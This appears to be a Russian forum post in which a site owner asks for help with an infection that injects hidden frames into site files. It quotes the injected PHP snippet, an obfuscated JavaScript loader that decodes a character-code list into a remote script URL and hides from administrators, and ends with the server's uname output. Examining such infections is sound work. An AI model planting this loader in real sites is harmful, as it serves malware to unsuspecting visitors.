Где-то месяц назад пользователи начали жаловаться, что у них антивирус ругается при заходе на сайт. Выяснил, что этот вирус постоянно прописывает в разные файлы скрытые фреймы.
Пример.
Код: Выделить всё
if($member_id['user_group'] != "1"){
echo <<<HTML
<script type="text/javascript" language="javascript">
<!--
function zDhTB(geQzA){document.write(String.fromCharCode(parseInt(geQzA)-2));}
var RuZRs="106B118B118B114B60B49B49B105B113B109B110B107B109B117B48B116B119B49B+105B103B118B48B108B117B+65B119B117B103B116B97B107B102B63B59B50B53B+40B111B113B102B103B63B101B110B107B101B109B"; var rxaZZ=RuZRs.split("B");
document.write("<s"+"cript type='text/javascript' language='javascri"+"pt' src='");
var YbZEu=0;while(YbZEu<rxaZZ.length-1){zDhTB(rxaZZ[YbZEu]);YbZEu++;}
document.write("'></sc"+"ript>");
// -->
</script>
HTML;
}
Да, чуть не забыл,
Код: Выделить всё
uname -a
Linux ####.vps.agava.net 2.6.18-194.8.1.el5.028stab070.2 #1 SMP 